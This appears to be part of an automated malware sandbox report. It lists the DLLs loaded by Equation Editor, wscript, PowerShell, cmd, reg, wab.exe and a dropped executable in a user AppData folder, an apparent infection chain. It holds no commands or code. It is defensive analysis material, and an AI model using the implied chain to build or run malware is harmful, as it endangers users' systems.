Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn2.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64win.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wow64cpu.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: nlaapi.dll
